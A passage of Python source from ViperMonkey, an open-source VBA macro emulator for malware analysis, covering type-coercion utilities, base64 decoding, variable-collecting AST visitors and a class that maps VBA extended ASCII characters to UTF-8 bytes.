NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 34 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 35 | 36 | import re 37 | from curses_ascii import isascii 38 | from curses_ascii import isprint 39 | import base64 40 | 41 | import logging 42 | 43 | # for logging 44 | try: 45 | from core.logger import log 46 | except ImportError: 47 | from logger import log 48 | try: 49 | from core.logger import CappedFileHandler 50 | except ImportError: 51 | from logger import CappedFileHandler 52 | from logging import LogRecord 53 | from logging import FileHandler 54 | import excel 55 | 56 | def safe_str_convert(s): 57 | """ 58 | Convert a string to ASCII without throwing a unicode decode error. 59 | """ 60 | 61 | # Handle Excel strings. 62 | if (isinstance(s, dict) and ("value" in s)): 63 | s = s["value"] 64 | 65 | # Do the actualk string conversion. 66 | try: 67 | return str(s) 68 | except UnicodeDecodeError: 69 | return filter(isprint, s) 70 | except UnicodeEncodeError: 71 | return filter(isprint, s) 72 | 73 | class Infix: 74 | """ 75 | Used to define our own infix operators. 76 | """ 77 | def __init__(self, function): 78 | self.function = function 79 | def __ror__(self, other): 80 | return Infix(lambda x, self=self, other=other: self.function(other, x)) 81 | def __or__(self, other): 82 | return self.function(other) 83 | def __rlshift__(self, other): 84 | return Infix(lambda x, self=self, other=other: self.function(other, x)) 85 | def __rshift__(self, other): 86 | return self.function(other) 87 | def __call__(self, value1, value2): 88 | return self.function(value1, value2) 89 | 90 | def safe_plus(x,y): 91 | """ 92 | Handle "x + y" where x and y could be some combination of ints and strs. 93 | """ 94 | 95 | # Handle Excel Cell objects. Grrr. 96 | if excel.is_cell_dict(x): 97 | x = x["value"] 98 | if excel.is_cell_dict(y): 99 | y = y["value"] 100 | 101 | # Handle NULLs. 102 | if (x == "NULL"): 103 | x = 0 104 | if (y == "NULL"): 105 | y = 0 106 | 107 | # Loosely typed languages are terrible. 1 + "3" == 4 while "1" + 3 108 | # = "13". The type of the 1st argument drives the dynamic type 109 | # casting (I think) minus variable type information (Dim a as 110 | # String:a = 1 + "3" gets "13", we're ignoring that here). Pure 111 | # garbage. 112 | if (isinstance(x, str)): 113 | y = str_convert(y) 114 | if (isinstance(x, int)): 115 | y = int_convert(y) 116 | 117 | # Easy case first. 118 | if ((isinstance(x, int) or isinstance(x, float)) and 119 | (isinstance(y, int) or isinstance(y, float))): 120 | return x + y 121 | 122 | # Fix data types. 123 | if (isinstance(y, str)): 124 | 125 | # NULL string in VB. 126 | if (x == 0): 127 | x = "" 128 | 129 | # String concat. 130 | return str(x) + y 131 | 132 | if (isinstance(x, str)): 133 | 134 | # NULL string in VB. 135 | if (y == 0): 136 | y = "" 137 | 138 | # String concat. 139 | return x + str(y) 140 | 141 | # Punt. We are not doing pure numeric addition and 142 | # we have already handled string concatentaion. Just 143 | # convert things to strings and hope for the best. 144 | return str(x) + str(y) 145 | 146 | # Safe plus infix operator. Ugh. 147 | plus=Infix(lambda x,y: safe_plus(x, y)) 148 | 149 | def safe_equals(x,y): 150 | """ 151 | Handle "x = y" where x and y could be some combination of ints and strs. 152 | """ 153 | 154 | # Handle NULLs. 155 | if (x == "NULL"): 156 | x = 0 157 | if (y == "NULL"): 158 | y = 0 159 | 160 | # Easy case first. 161 | if (type(x) == type(y)): 162 | return x == y 163 | 164 | # Booleans and ints can be directly compared. 165 | if ((isinstance(x, bool) and (isinstance(y, int))) or 166 | (isinstance(y, bool) and (isinstance(x, int)))): 167 | return x == y 168 | 169 | # Punt. Just convert things to strings and hope for the best. 170 | return str(x) == str(y) 171 | 172 | # Safe equals and not equals infix operators. Ugh. Loosely typed languages are terrible. 173 | eq=Infix(lambda x,y: safe_equals(x, y)) 174 | neq=Infix(lambda x,y: (not safe_equals(x, y))) 175 | 176 | def safe_print(text): 177 | """ 178 | Sometimes printing large strings when running in a Docker container triggers exceptions. 179 | This function just wraps a print in a try/except block to not crash ViperMonkey when this happens. 180 | """ 181 | text = safe_str_convert(text) 182 | try: 183 | print(text) 184 | except Exception as e: 185 | msg = "ERROR: Printing text failed (len text = " + str(len(text)) + ". " + str(e) 186 | if (len(msg) > 100): 187 | msg = msg[:100] 188 | try: 189 | print(msg) 190 | except: 191 | pass 192 | 193 | # if our logger has a FileHandler, we need to tee this print to a file as well 194 | for handler in log.handlers: 195 | if type(handler) is FileHandler or type(handler) is CappedFileHandler: 196 | # set the format to be like a print, not a log, then set it back 197 | handler.setFormatter(logging.Formatter("%(message)s")) 198 | handler.emit(LogRecord(log.name, logging.INFO, "", None, text, None, None, "safe_print")) 199 | handler.setFormatter(logging.Formatter("%(levelname)-8s %(message)s")) 200 | 201 | def fix_python_overlap(var_name): 202 | builtins = set(["str", "list", "bytes", "pass"]) 203 | if (var_name.lower() in builtins): 204 | var_name = "MAKE_UNIQUE_" + var_name 205 | var_name = var_name.replace("$", "__DOLLAR__") 206 | # RegExp object? 207 | if ((not var_name.endswith(".Pattern")) and 208 | (not var_name.endswith(".Global"))): 209 | var_name = var_name.replace(".", "") 210 | return var_name 211 | 212 | def b64_decode(value): 213 | """ 214 | Base64 decode a string. 215 | """ 216 | 217 | try: 218 | # Make sure this is a potentially valid base64 string 219 | tmp_str = "" 220 | try: 221 | tmp_str = filter(isascii, str(value).strip()) 222 | except UnicodeDecodeError: 223 | return None 224 | tmp_str = tmp_str.replace(" ", "").replace("\x00", "") 225 | b64_pat = r"^[A-Za-z0-9+/=]+$" 226 | if (re.match(b64_pat, tmp_str) is not None): 227 | 228 | # Pad out the b64 string if needed. 229 | missing_padding = len(tmp_str) % 4 230 | if missing_padding: 231 | tmp_str += b'='* (4 - missing_padding) 232 | 233 | # Return the decoded value. 234 | conv_val = base64.b64decode(tmp_str) 235 | return conv_val 236 | 237 | # Base64 conversion error. 238 | except Exception as e: 239 | pass 240 | 241 | # No valid base64 decode. 242 | return None 243 | 244 | class vb_RegExp(object): 245 | """ 246 | Class to simulate a VBS RegEx object in python. 247 | """ 248 | 249 | def __init__(self): 250 | self.Pattern = None 251 | self.Global = False 252 | 253 | def __repr__(self): 254 | return "" 255 | 256 | def _get_python_pattern(self): 257 | pat = self.Pattern 258 | if (pat is None): 259 | return None 260 | if (pat.strip() != "."): 261 | pat1 = pat.replace("$", "\\$").replace("-", "\\-") 262 | fix_dash_pat = r"(\[.\w+)\\\-(\w+\])" 263 | pat1 = re.sub(fix_dash_pat, r"\1-\2", pat1) 264 | fix_dash_pat1 = r"\((\w+)\\\-(\w+)\)" 265 | pat1 = re.sub(fix_dash_pat1, r"[\1-\2]", pat1) 266 | pat = pat1 267 | return pat 268 | 269 | def Test(self, string): 270 | pat = self._get_python_pattern() 271 | #print "PAT: '" + pat + "'" 272 | #print "STR: '" + string + "'" 273 | #print re.findall(pat, string) 274 | if (pat is None): 275 | return False 276 | return (re.match(pat, string) is not None) 277 | 278 | def Replace(self, string, rep): 279 | pat = self._get_python_pattern() 280 | if (pat is None): 281 | return string 282 | rep = re.sub(r"\$(\d)", r"\\\1", rep) 283 | r = string 284 | try: 285 | r = re.sub(pat, rep, string) 286 | except Exception as e: 287 | pass 288 | return r 289 | 290 | def get_num_bytes(i): 291 | """ 292 | Get the minimum number of bytes needed to represent a given 293 | int value. 294 | """ 295 | 296 | # 1 byte? 297 | if ((i & 0x00000000FF) == i): 298 | return 1 299 | # 2 bytes? 300 | if ((i & 0x000000FFFF) == i): 301 | return 2 302 | # 4 bytes? 303 | if ((i & 0x00FFFFFFFF) == i): 304 | return 4 305 | # Lets go with 8 bytes. 306 | return 8 307 | 308 | def int_convert(arg, leave_alone=False): 309 | """ 310 | Convert a VBA expression to an int, handling VBA NULL. 311 | """ 312 | 313 | # Easy case. 314 | if (isinstance(arg, int)): 315 | return arg 316 | 317 | # NULLs are 0. 318 | if (arg == "NULL"): 319 | return 0 320 | 321 | # Empty strings are NULL. 322 | if (arg == ""): 323 | return "NULL" 324 | 325 | # Leave the wildcard matching value alone. 326 | if (arg == "**MATCH ANY**"): 327 | return arg 328 | 329 | # Convert float to int? 330 | if (isinstance(arg, float)): 331 | arg = int(round(arg)) 332 | 333 | # Convert hex to int? 334 | if (isinstance(arg, str) and (arg.strip().lower().startswith("&h"))): 335 | hex_str = "0x" + arg.strip()[2:] 336 | try: 337 | return int(hex_str, 16) 338 | except: 339 | log.error("Cannot convert hex '" + str(arg) + "' to int. Defaulting to 0. " + str(e)) 340 | return 0 341 | 342 | arg_str = str(arg) 343 | if ("." in arg_str): 344 | arg_str = arg_str[:arg_str.index(".")] 345 | try: 346 | return int(arg_str) 347 | except Exception as e: 348 | if (not leave_alone): 349 | log.error("Cannot convert '" + str(arg_str) + "' to int. Defaulting to 0. " + str(e)) 350 | return 0 351 | log.error("Cannot convert '" + str(arg_str) + "' to int. Leaving unchanged. " + str(e)) 352 | return arg_str 353 | 354 | def str_convert(arg): 355 | """ 356 | Convert a VBA expression to an str, handling VBA NULL. 357 | """ 358 | if (arg == "NULL"): 359 | return '' 360 | if (excel.is_cell_dict(arg)): 361 | arg = arg["value"] 362 | try: 363 | return str(arg) 364 | except Exception as e: 365 | if (isinstance(arg, unicode)): 366 | return ''.join(filter(lambda x:x in string.printable, arg)) 367 | log.error("Cannot convert given argument to str. Defaulting to ''. " + str(e)) 368 | return '' 369 | 370 | def strip_nonvb_chars(s): 371 | """ 372 | Strip invalid VB characters from a string. 373 | """ 374 | 375 | # Handle unicode strings. 376 | if (isinstance(s, unicode)): 377 | s = s.encode('ascii','replace') 378 | 379 | # Sanity check. 380 | if (not isinstance(s, str)): 381 | return s 382 | 383 | # Do we need to do this? 384 | if (re.search(r"[^\x09-\x7e]", s) is None): 385 | return s 386 | 387 | # Strip non-ascii printable characters. 388 | r = re.sub(r"[^\x09-\x7e]", "", s) 389 | 390 | # Strip multiple 'NULL' substrings from the string. 391 | if (r.count("NULL") > 10): 392 | r = r.replace("NULL", "") 393 | return r 394 | 395 | -------------------------------------------------------------------------------- /vipermonkey/core/var_defn_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names declared variables. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from statements import * 41 | 42 | class var_defn_visitor(visitor): 43 | """ 44 | Collect the names of all declared variables. 45 | """ 46 | 47 | def __init__(self): 48 | self.variables = set() 49 | self.visited = set() 50 | 51 | def visit(self, item): 52 | if (item in self.visited): 53 | return False 54 | self.visited.add(item) 55 | if (isinstance(item, Dim_Statement)): 56 | for name, _, _, _ in item.variables: 57 | self.variables.add(str(name)) 58 | if (isinstance(item, Let_Statement)): 59 | self.variables.add(str(item.name)) 60 | return True 61 | -------------------------------------------------------------------------------- /vipermonkey/core/var_in_expr_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names declared variables. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from statements import * 41 | 42 | class var_in_expr_visitor(visitor): 43 | """ 44 | Get the names of all variables that appear in an expression. 45 | """ 46 | 47 | def __init__(self, context=None): 48 | self.variables = set() 49 | self.visited = set() 50 | self.context = context 51 | 52 | def visit(self, item): 53 | from expressions import SimpleNameExpression 54 | from expressions import Function_Call 55 | from expressions import MemberAccessExpression 56 | from vba_object import VbaLibraryFunc 57 | from vba_object import VBA_Object 58 | 59 | # Already looked at this? 60 | if (item in self.visited): 61 | return False 62 | self.visited.add(item) 63 | 64 | # Simple variable? 65 | if (isinstance(item, SimpleNameExpression)): 66 | self.variables.add(str(item.name)) 67 | 68 | # Array access? 69 | if (("Function_Call" in str(type(item))) and (self.context is not None)): 70 | 71 | # Is this an array or function? 72 | if (hasattr(item, "name") and (self.context.contains(item.name))): 73 | ref = self.context.get(item.name) 74 | if (isinstance(ref, list) or isinstance(ref, str)): 75 | self.variables.add(str(item.name)) 76 | 77 | # Member access expression used as a variable? 78 | if (isinstance(item, MemberAccessExpression)): 79 | rhs = item.rhs 80 | if (isinstance(rhs, list)): 81 | rhs = rhs[-1] 82 | if (isinstance(rhs, SimpleNameExpression)): 83 | self.variables.add(str(item)) 84 | 85 | return True 86 | -------------------------------------------------------------------------------- /vipermonkey/core/vb_str.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Class for representing VBA strings that contain a mix of ASCII and 3 | wide character characters. 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | __version__ = '0.08' 41 | 42 | import string 43 | import sys 44 | try: 45 | # sudo pypy -m pip install rure 46 | import rure as re 47 | except: 48 | import re 49 | 50 | def is_wide_str(the_str): 51 | """ 52 | Test to see if the given string is a simple wide char string (every other 53 | character is a null byte). 54 | """ 55 | if (len(the_str) < 2): 56 | return False 57 | if ((len(the_str) % 2) != 0): 58 | return False 59 | if ('\x00' not in the_str): 60 | return False 61 | if (the_str.count('\x00') != len(the_str)/2): 62 | return False 63 | is_wide = True 64 | for i in range(1, len(the_str)/2 + 1): 65 | if (the_str[i * 2 - 1] != '\x00'): 66 | is_wide = False 67 | break 68 | return is_wide 69 | 70 | def convert_wide_to_ascii(the_str): 71 | """ 72 | Convert a simple wide string to ASCII. 73 | """ 74 | if (not is_wide_str(the_str)): 75 | return the_str 76 | # Return every other character. 77 | return the_str[::2] 78 | 79 | def is_mixed_wide_ascii_str(the_str): 80 | """ 81 | Test a string to see if it is a mix of wide and ASCII chars. 82 | """ 83 | uni_str = None 84 | try: 85 | uni_str = the_str.decode("utf-8") 86 | except UnicodeDecodeError: 87 | # Punt. 88 | return False 89 | extended_asc_pat = b"[\x80-\xff]" 90 | if (re.search(extended_asc_pat, uni_str) is not None): 91 | return True 92 | return False 93 | 94 | str_to_ascii_map = None 95 | def get_ms_ascii_value(the_str): 96 | """ 97 | Get the VBA ASCII value of a given string. This handles VBA using a different 98 | extended ASCII character set than everyone else in the world. 99 | 100 | This handles both retgular Python strings and VbStr objects. 101 | """ 102 | 103 | # Sanity check. 104 | if ((not isinstance(the_str, str)) and (not isinstance(the_str, VbStr))): 105 | return ValueError("'" + str(the_str) + "' is not a string.") 106 | 107 | # Initialize the map from wide char strings to MS ascii value if needed. 108 | global str_to_ascii_map 109 | if (str_to_ascii_map is None): 110 | str_to_ascii_map = {} 111 | for code in VbStr.ascii_map.keys(): 112 | for bts in VbStr.ascii_map[code]: 113 | chars = "" 114 | for bt in bts: 115 | chars += chr(bt) 116 | str_to_ascii_map[chars] = code 117 | 118 | # Convert the string to a Python string if we were given a VB string. 119 | if (isinstance(the_str, VbStr)): 120 | the_str = the_str.to_python_str() 121 | 122 | # Sanity check. 123 | if (len(the_str) == 0): 124 | #raise ValueError("String length is 0.") 125 | return 0 126 | 127 | # Look up the MS extended ASCII code. 128 | if (the_str not in str_to_ascii_map): 129 | 130 | # Punt and just return the code for the 1st char in the string. 131 | return ord(the_str[0]) 132 | 133 | # MS wide char. Return MS extended ASCII code. 134 | return str_to_ascii_map[the_str] 135 | 136 | class VbStr(object): 137 | 138 | # VBA uses a different extended ASCII character set for byte values greater than 127 139 | # (https://bettersolutions.com/vba/strings-characters/ascii-characters.htm). These 140 | # are seen by ViperMonkey as multi-byte characters. To handle this we have a map that 141 | # maps from the "special" VBA ASCII code for a character to the byte arrays representing 142 | # the unicode representation of the character that the rest of the world uses. 143 | ascii_map = { 144 | 128: [[226, 130, 172]], 145 | #129: [[239, 191, 189], [208, 131]], 146 | 129: [[208, 131]], 147 | 130: [[226, 128, 154]], 148 | 131: [[198, 146], [209, 147]], 149 | 132: [[226, 128, 158]], 150 | 133: [[226, 128, 166]], 151 | 134: [[226, 128, 160]], 152 | 135: [[226, 128, 161]], 153 | 136: [[203, 134]], 154 | 137: [[226, 128, 176]], 155 | 138: [[197, 160]], 156 | 139: [[226, 128, 185]], 157 | 140: [[197, 146]], 158 | # TODO: Figure out actual bytes for the commented out characters. 159 | #141: [[239, 191, 189]], 160 | 142: [[197, 189]], 161 | #143: [[239, 191, 189]], 162 | #144: [[239, 191, 189]], 163 | 145: [[226, 128, 152]], 164 | 146: [[226, 128, 153]], 165 | 147: [[226, 128, 156]], 166 | 148: [[226, 128, 157]], 167 | 149: [[226, 128, 162]], 168 | 150: [[226, 128, 147]], 169 | 151: [[226, 128, 148]], 170 | 152: [[203, 156]], 171 | 153: [[226, 132, 162]], 172 | 154: [[197, 161]], 173 | 155: [[226, 128, 186]], 174 | 156: [[197, 147]], 175 | 157: [[239, 191, 189]], 176 | 158: [[197, 190]], 177 | 159: [[197, 184]], 178 | 160: [[194, 160]], 179 | 161: [[194, 161]], 180 | 162: [[194, 162]], 181 | 163: [[194, 163]], 182 | 164: [[194, 164]], 183 | 165: [[194, 165]], 184 | 166: [[194, 166]], 185 | 167: [[194, 167]], 186 | 168: [[194, 168]], 187 | 169: [[194, 169]], 188 | 170: [[194, 170]], 189 | 171: [[194, 171]], 190 | 172: [[194, 172]], 191 | 173: [[194, 173]], 192 | 174: [[194, 174]], 193 | 175: [[194, 175]], 194 | 176: [[194, 176]], 195 | 177: [[194, 177]], 196 | 178: [[194, 178]], 197 | 179: [[194, 179]], 198 | 180: [[194, 180]], 199 | 181: [[194, 181]], 200 | 182: [[194, 182]], 201 | 183: [[194, 183]], 202 | 184: [[194, 184]], 203 | 185: [[194, 185]], 204 | 186: [[194, 186]], 205 | 187: [[194, 187]], 206 | 188: [[194, 188]], 207 | 189: [[194, 189]], 208 | 190: [[194, 190]], 209 | 191: [[194, 191]], 210 | 192: [[195, 128]], 211 | 193: [[195, 129]], 212 | 194: [[195, 130]], 213 | 195: [[195, 131]], 214 | 196: [[195, 132]], 215 | 197: [[195, 133]], 216 | 198: [[195, 134]], 217 | 199: [[195, 135]], 218 | 200: [[195, 136]], 219 | 201: [[195, 137]], 220 | 202: [[195, 138]], 221 | 203: [[195, 139]], 222 | 204: [[195, 140]], 223 | 205: [[195, 141]], 224 | 206: [[195, 142]], 225 | 207: [[195, 143]], 226 | 208: [[195, 144]], 227 | 209: [[195, 145]], 228 | 210: [[195, 146]], 229 | 211: [[195, 147]], 230 | 212: [[195, 148]], 231 | 213: [[195, 149]], 232 | 214: [[195, 150]], 233 | 215: [[195, 151]], 234 | 216: [[195, 152]], 235 | 217: [[195, 153]], 236 | 218: [[195, 154]], 237 | 219: [[195, 155]], 238 | 220: [[195, 156]], 239 | 221: [[195, 157]], 240 | 222: [[195, 158]], 241 | 223: [[195, 159]], 242 | 224: [[195, 160]], 243 | 225: [[195, 161]], 244 | 226: [[195, 162]], 245 | 227: [[195, 163]], 246 | 228: [[195, 164]], 247 | 229: [[195, 165]], 248 | 230: [[195, 166]], 249 | 231: [[195, 167]], 250 | 232: [[195, 168]], 251 | 233: [[195, 169]], 252 | 234: [[195, 170]], 253 | 235: [[195, 171]], 254 | 236: [[195, 172]], 255 | 237: [[195, 173]], 256 | 238: [[195, 174]], 257 | 239: [[195, 175]], 258 | 240: [[195, 176]], 259 | 241: [[195, 177]], 260 | 242: [[195, 178]], 261 | 243: [[195, 179]], 262 | 244: [[195, 180]], 263 | 245: [[195, 181]], 264 | 246: [[195, 182]], 265 | 247: [[195, 183]], 266 | 248: [[195, 184]], 267 | 249: [[195, 185]], 268 | 250: [[195, 186]], 269 | 251: [[195, 187]], 270 | 252: [[195, 188]], 271 | 253: [[195, 189]], 272 | 254: [[195, 190]], 273 | 255: [[195, 191]], 274 | } 275 | 276 | def __init__(self, orig_str, is_vbscript=False): 277 | """ 278 | Create a new VBA string object. 279 | 280 | orig_str - The raw Python string. 281 | is_vbscript - VBScript handles mixed ASCII/wide char strings differently than 282 | VBA. Set this to True if VBScript is being analyzed, False if VBA is being 283 | analyzed. 284 | 285 | NOTE: This just handles characters from Microsoft's special extended ASCII set. 286 | 287 | """ 288 | 289 | # Track if this is a VBScript string. 290 | self.is_vbscript = is_vbscript 291 | 292 | # Copy contructor? (sort of). 293 | if (isinstance(orig_str, list)): 294 | self.vb_str = orig_str 295 | self.orig_str = "".join(self.vb_str) 296 | return 297 | 298 | # Make sure we have a string. 299 | try: 300 | orig_str = str(orig_str) 301 | except: 302 | if (isinstance(orig_str, unicode)): 303 | orig_str = ''.join(filter(lambda x:x in string.printable, orig_str)) 304 | else: 305 | raise ValueError("Given value cannot be converted to a string.") 306 | self.orig_str = orig_str 307 | 308 | # If this is VBScript each character will be a single byte (like the Python 309 | # string). 310 | self.vb_str = [] 311 | if (is_vbscript): 312 | self.vb_str = list(orig_str) 313 | 314 | # This is a VBA string. 315 | else: 316 | 317 | # Break out ASCII characters and multi-byte wide chars as individual "characters". 318 | 319 | # Replace the multi-byte wide chars with special strings. We will break these out 320 | # later. 321 | tmp_str = orig_str 322 | for code in self.ascii_map.keys(): 323 | chars = "" 324 | for bts in self.ascii_map[code]: 325 | pos = 0 326 | for bval in bts: 327 | chars += chr(bval) 328 | code_str = None 329 | try: 330 | code_str = str(code) 331 | except UnicodeEncodeError: 332 | code_str = filter(isprint, code) 333 | try: 334 | tmp_str = str(tmp_str) 335 | except UnicodeEncodeError: 336 | tmp_str = filter(isprint, tmp_str) 337 | #print tmp_str 338 | #print type(tmp_str) 339 | #print code 340 | #print type(code) 341 | #print pos 342 | #print type(pos) 343 | #print code_str 344 | #print type(code_str) 345 | tmp_str = tmp_str.replace(chars, "MARK!@#$%%$#@!:.:.:.:.:.:." + code_str + "_" + str(pos) + "MARK!@#$%%$#@!") 346 | 347 | # Split the string up into ASCII char chunks and individual wide chars. 348 | for val in tmp_str.split("MARK!@#$%"): 349 | 350 | # Remove additonal markings. 351 | val = val.replace("%$#@!", "") 352 | 353 | # Sanity check. 354 | if (len(val) == 0): 355 | continue 356 | 357 | # Is this a special MS extended ASCII char? 358 | if (val.startswith(":.:.:.:.:.:.")): 359 | 360 | # Yes, break this out as a single "wide char". 361 | val = val.replace(":.:.:.:.:.:.", "") 362 | pos = int(val.split("_")[1]) 363 | val = int(val.split("_")[0]) 364 | chars = "" 365 | for bt in self.ascii_map[val][pos]: 366 | chars += chr(bt) 367 | self.vb_str.append(chars) 368 | 369 | # ASCII char chunk. 370 | else: 371 | for c in val: 372 | self.vb_str.append(c) 373 | 374 | def __repr__(self): 375 | r = "" 376 | for vb_c in self.vb_str: 377 | if (len(r) > 0): 378 | r += ":" 379 | if (len(vb_c) == 1): 380 | if (ord(vb_c) == 127): 381 | r += str(hex(ord(vb_c))) 382 | else: 383 | r += vb_c 384 | else: 385 | first = True 386 | for c in vb_c: 387 | if (not first): 388 | r += " " 389 | first = False 390 | r += hex(ord(c)) 391 | 392 | return r 393 | 394 | def len(self): 395 | return len(self.vb_str) 396 | 397 | def to_python_str(self): 398 | """ 399 | Return the VB string as a raw Python str. 400 | """ 401 | return "".join(self.vb_str) 402 | 403 | def get_chunk(self, start, end): 404 | """ 405 | Return a chunk of the string as a vb_string object. 406 | """ 407 | 408 | # Sanity check. 409 | if ((start < 0) or (start > len(self.vb_str))): 410 | raise ValueError("start index " + str(start) + " out of bounds.") 411 | if ((end < 0) or (end > len(self.vb_str))): 412 | raise ValueError("end index " + str(start) + " out of bounds.") 413 | if (start > end): 414 | raise ValueError("start index (" + str(start) + ") > end index (" + str(end) + ").") 415 | 416 | # Return the chunk. 417 | return VbStr(self.vb_str[start:end]) 418 | 419 | def update_chunk(self, start, end, new_str): 420 | """ 421 | Return a new copy of the current string updated with the given chunk 422 | replaced with the given string (can be a VbStr or a raw Python string). 423 | 424 | The current VB string object is not changed. 425 | """ 426 | 427 | # Sanity check. 428 | if ((start < 0) or (start >= len(self.vb_str))): 429 | raise ValueError("start index " + str(start) + " out of bounds.") 430 | if ((end < 0) or (end > len(self.vb_str))): 431 | raise ValueError("end index " + str(end) + " out of bounds.") 432 | if (start > end): 433 | raise ValueError("start index (" + str(start) + ") > end index (" + str(end) + ").") 434 | 435 | # Pull out the unchanged prefix and suffix. 436 | prefix = self.get_chunk(0, start).to_python_str() 437 | suffix = self.get_chunk(end, self.len()).to_python_str() 438 | 439 | # Put string together as a Python string. 440 | if (isinstance(new_str, VbStr)): 441 | new_str = new_str.to_python_str() 442 | 